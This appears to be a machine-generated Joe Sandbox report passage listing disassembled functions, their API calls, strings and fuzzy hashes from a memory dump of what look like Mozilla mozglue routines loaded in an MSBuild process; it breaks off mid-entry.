Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: ba27b05acc491a2baf43a287a018ef7d5c2bcf03f88f90401e52db2caba86641
Instruction ID: 2e811b071c92eefa56693aa5b40624e83c5030affd63f0173c2d4f21961d7181
Opcode Fuzzy Hash: ba27b05acc491a2baf43a287a018ef7d5c2bcf03f88f90401e52db2caba86641
Instruction Fuzzy Hash: 6E719471F042198FDB09DF69C8A0E9DB7F2AF84314F26812DD80AA7714DB31A946CBC1

Function 6C4F14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4F14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4F14E2
GetCurrentThreadId.KERNEL32 ref: 6C4F1546
InitializeConditionVariable.KERNEL32(?), ref: 6C4F15BA
free.MOZGLUE(?), ref: 6C4F16B4

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: ef72c82960da96824da1ff09f891872d095d79e8aa63cf5631ffc216669198b0
Instruction ID: 9e96484d78cd06f8fbba7a4fa53cd44b97125778a8b3d8efc150925101b61102
Opcode Fuzzy Hash: ef72c82960da96824da1ff09f891872d095d79e8aa63cf5631ffc216669198b0
Instruction Fuzzy Hash: BD61DEB1A007409BDB12CF20C880FDEB7B1BF89308F45951CE98A57701DB31E949CB91

Function 6C4EC160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C4EC1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C4EC293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C4EC29E

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: f08e91c1329bf727098770abb2183bb8e444687c1ccea08af37084dfbaee0065
Instruction ID: 4ef58ce2cbe1bb2fa0824075b015f61dded8fdff73384b7e83f83ef59a7c6da0
Opcode Fuzzy Hash: f08e91c1329bf727098770abb2183bb8e444687c1ccea08af37084dfbaee0065
Instruction Fuzzy Hash: 95619971E00218CFCB15DFA8D884DAEBBB5FF49316F164629E812A7B50C731A945CFA1

Function 6C4E9F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4E9FDB
free.MOZGLUE(?,?), ref: 6C4E9FF0
free.MOZGLUE(?,?), ref: 6C4EA006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4EA0BE
free.MOZGLUE(?,?), ref: 6C4EA0D5
free.MOZGLUE(?,?), ref: 6C4EA0EB

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: c3cbcabf4ae4e335a6864a1283eda3ce593b552d4d1a94ebbebdd52515691443
Instruction ID: 0963353c8d6070ffd764654f1c0c3f2814211dfe5b1a23afa2bd76ba3350f477
Opcode Fuzzy Hash: c3cbcabf4ae4e335a6864a1283eda3ce593b552d4d1a94ebbebdd52515691443
Instruction Fuzzy Hash: 4661B0758086019FC712CF18C480D9AB7F5FF88329F55865DE8999BB02E732E986CBD1

Function 6C4EDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4EDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C4ED38A,?), ref: 6C4EDC6F
free.MOZGLUE(?,?,?,?,?,6C4ED38A,?), ref: 6C4EDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C4ED38A,?), ref: 6C4EDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C4ED38A,?), ref: 6C4EDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C4ED38A,?), ref: 6C4EDD4A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 8434ae4e84d7489b1e41cb0573bf12887ddee379778bad15d573c99331198e49
Instruction ID: a89695aa4f04f1a203e077fef5e084e5274418c5c0326f7b7869841f75233548
Opcode Fuzzy Hash: 8434ae4e84d7489b1e41cb0573bf12887ddee379778bad15d573c99331198e49
Instruction Fuzzy Hash: 1B4125B5A006158FCB00CF99C880D9AB7B6FF8C315B564569D945ABB11DB71FC00CB90

Function 6C4939A0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C51E744,ewOl,00000000,ewOl,?,6C4B6112), ref: 6C4939AF
LeaveCriticalSection.KERNEL32(6C51E744,?,6C4B6112), ref: 6C493A34
EnterCriticalSection.KERNEL32(6C51E784,6C4B6112), ref: 6C493A4B
LeaveCriticalSection.KERNEL32(6C51E784), ref: 6C493A5F

Strings

ewOl, xrefs: 6C4939A3, 6C4939A5
\Ql, xrefs: 6C493A02

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: \Ql$ewOl
API String ID: 3168844106-2777859954
Opcode ID: f612320371d6e7e90bf06eb77eca5b271db2dd43d0b80a5291505633456744af
Instruction ID: a310f3eb724bcc0d73a5d6b920b6aebfe19ac90da949980fe6e3134afe71b1e6
Opcode Fuzzy Hash: f612320371d6e7e90bf06eb77eca5b271db2dd43d0b80a5291505633456744af
Instruction Fuzzy Hash: A02123327056119FEB14DB69CC4EF2A7BB1EB87714726061DC86987F50DB70A80187C6

Function 6C4EC810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C4EC82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C4EC842

Part of subcall function 6C4ECAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C50B5EB,00000000), ref: 6C4ECB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C4EC863
std::_Facet_Register.LIBCPMT ref: 6C4EC875

Part of subcall function 6C4CB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C50B636,?), ref: 6C4CB143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C4EC89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4EC8BC

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: 7d6c80604c0a349f848dec715011e97afb9c79cfd8d771d0d99cdbb26798e18a
Instruction ID: b4c9feefb2bb76a28ed5e45f87bb42811fbb4657555daa30973c55df722832f6
Opcode Fuzzy Hash: 7d6c80604c0a349f848dec715011e97afb9c79cfd8d771d0d99cdbb26798e18a
Instruction Fuzzy Hash: 30116375B002059BCB04EFA4CD8EDAE7B75FF89356B020129E91697B51DB309904CBD5

Function 6C4E0180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C4E0270
GetCurrentThreadId.KERNEL32 ref: 6C4E02E9
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4E02F6
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4E033A

Strings

about:blank, xrefs: 6C4E020F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: 34460f72da5778c2e067fde91f8922deca3adbcd804d2ace991c37de183effb0
Instruction ID: c10dd9c68ee7b559467da8e1ae10cc4035f012befcc31c2dec00a859a22cbd50
Opcode Fuzzy Hash: 34460f72da5778c2e067fde91f8922deca3adbcd804d2ace991c37de183effb0
Instruction Fuzzy Hash: 9651AF74A002158FCB00DF59C884E9AB7F1FF4C31AF264619D82AA7B41DB31BC46CB95

Function 6C4DE100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DE12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C4DE084,00000000), ref: 6C4DE137

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C4DE196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C4DE1E9

Part of subcall function 6C4D99A0: GetCurrentThreadId.KERNEL32 ref: 6C4D99C1
Part of subcall function 6C4D99A0: AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4D99CE
Part of subcall function 6C4D99A0: ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4D99F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6C4DE13F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: c4d9408007e69a45d1e49a57540d05e49ae6d7cbc0aec4436f45ade4697de54d
Instruction ID: 3363e64e64de893fc4e857cb52366519220d1936e020c753bebe1ff0de5f0d73
Opcode Fuzzy Hash: c4d9408007e69a45d1e49a57540d05e49ae6d7cbc0aec4436f45ade4697de54d
Instruction Fuzzy Hash: 903103B17043009BD700EF688865FAAF7E5ABD5209F15852DE8458BB41EB709909C7D3

Function 6C4CF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C4CF480

Part of subcall function 6C49F100: LoadLibraryW.KERNEL32(shell32,?,6C50D020), ref: 6C49F122
Part of subcall function 6C49F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C49F132

CloseHandle.KERNEL32(00000000), ref: 6C4CF555

Part of subcall function 6C4A14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C4A1248,6C4A1248,?), ref: 6C4A14C9
Part of subcall function 6C4A14B0: memcpy.VCRUNTIME140(?,6C4A1248,00000000,?,6C4A1248,?), ref: 6C4A14EF

Part of subcall function 6C49EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C49EEE3

CreateFileW.KERNEL32 ref: 6C4CF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C4CF523

Strings

\oleacc.dll, xrefs: 6C4CF4CB

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: d6a6179cbc1938297ca6debd4c19a0205cd6264232cd66c11a76823819b9f002
Instruction ID: 02ef4d3c47c3b2140e49bafcc322178199d8651b4d31172b477026db9f5f2fa0
Opcode Fuzzy Hash: d6a6179cbc1938297ca6debd4c19a0205cd6264232cd66c11a76823819b9f002
Instruction Fuzzy Hash: BE41B1707097109FE720DF68C884E9AB7F4AF44329F100A1CF69483A61EB74DA49CB92

Function 6C4DE020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DE047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DE04F

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4DE09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4DE0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6C4DE057

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: bc5a06541d5407bff415bd612bbc3972a76834e42be0d2ede29b52dfb5ba737e
Instruction ID: d323acf91d86231a4d887a5ca96ff75ba1b6419a11de6e0d407d4df7fdad97ee
Opcode Fuzzy Hash: bc5a06541d5407bff415bd612bbc3972a76834e42be0d2ede29b52dfb5ba737e
Instruction Fuzzy Hash: CA21D374B001188FDF04EF64C8A8EAEB7B5AF45209F160028E90A97741DB31B909C7D1

Function 6C4F74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C4F7526
__Init_thread_footer.LIBCMT ref: 6C4F7566
__Init_thread_footer.LIBCMT ref: 6C4F7597

Strings

UnmapViewOfFile2, xrefs: 6C4F7552
kernel32.dll, xrefs: 6C4F7557

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 7cbe01c20a14a39a6fe48184efd2b047a7e8c7c7dfec57a45433f2595ab23c9d
Instruction ID: 7815442d190dfbaffe9bf610493a826da56dab076bd8006fcc33f48f53feed57
Opcode Fuzzy Hash: 7cbe01c20a14a39a6fe48184efd2b047a7e8c7c7dfec57a45433f2595ab23c9d
Instruction Fuzzy Hash: B6210735709501A7EB15DFE8CC1DE5D37B6EBC6335B12062DE51547F40DB38A803869A

Function 6C4F7930 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C4ABF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C4F7A3F), ref: 6C4ABF11
Part of subcall function 6C4ABF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C4F7A3F), ref: 6C4ABF5D
Part of subcall function 6C4ABF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C4F7A3F), ref: 6C4ABF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C4F7968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C4FA264,6C4FA264), ref: 6C4F799A

Part of subcall function 6C4A9830: free.MOZGLUE(?,?,?,6C4F7ABE), ref: 6C4A985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C4F79E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C4F79E8

Strings

Pl, xrefs: 6C4F79D0

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID: Pl
API String ID: 3421697164-1791145779
Opcode ID: 265703bd48a0f0f9829957b8b2ce038855c3ed6de88e5d5d8f2277415d78c88e
Instruction ID: b06e2aabc807a0afc24878834256cf12e88cdfbe9221eda3d10f7ccc8c7dcb26
Opcode Fuzzy Hash: 265703bd48a0f0f9829957b8b2ce038855c3ed6de88e5d5d8f2277415d78c88e
Instruction Fuzzy Hash: DA216B757043049BCB08DF18D889A9EBBF5EF89310F05881DE88687761DB30A909CB92

Function 6C4FA7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C51F770,-00000001,?,6C50E330,?,6C4BBDF7), ref: 6C4FA7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C4BBDF7), ref: 6C4FA7C2
moz_xmalloc.MOZGLUE(00000018,?,6C4BBDF7), ref: 6C4FA7E4
LeaveCriticalSection.KERNEL32(6C51F770), ref: 6C4FA80A

Strings

accelerator.dll, xrefs: 6C4FA7BF

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: 241af628cdfa28f46d4d8dc2384e8ef3603afcbb8ba33375d86f2c889c2bfb9e
Instruction ID: 6cf760cacf336d335f4eebb08ccb95c8a146203db57c8941f68c6a3a20bed584
Opcode Fuzzy Hash: 241af628cdfa28f46d4d8dc2384e8ef3603afcbb8ba33375d86f2c889c2bfb9e
Instruction Fuzzy Hash: 6C018FB0B142049FEB04DF59DCC9D517BF8FF8A365705816AE8198BB51DB70A805CBA1

Function 6C49F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C49EE51,?), ref: 6C49F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C49F0C2

Strings

Could not find CoTaskMemFree, xrefs: 6C49F0E3
ole32, xrefs: 6C49F0AD
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C49F0DC

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 0fdc3edbcc8c235f18d322bdc5dd32fdcca8e6519393b8b9acb1bd737acc42e9
Instruction ID: 7075690ff12edbc3ff0c42a8df0f572d326c3d7777982738ced750d629b604f8
Opcode Fuzzy Hash: 0fdc3edbcc8c235f18d322bdc5dd32fdcca8e6519393b8b9acb1bd737acc42e9
Instruction Fuzzy Hash: 13E048B074A7119BBF149B779C1EE273FFD5B6220A715866DF512D1F00EA20D410C665

Function 6C4D00D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

